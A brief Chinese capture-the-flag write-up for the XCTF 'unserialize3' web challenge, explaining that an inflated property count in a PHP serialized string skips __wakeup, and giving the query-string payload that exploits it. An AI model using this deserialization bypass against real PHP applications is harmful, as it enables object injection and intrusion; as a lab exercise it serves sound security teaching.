攻防世界Web-unserialize3 随笔 第1张

当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行。

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

攻防世界Web-unserialize3 随笔 第2张

payload:

?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}

攻防世界Web-unserialize3 随笔 第3张

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄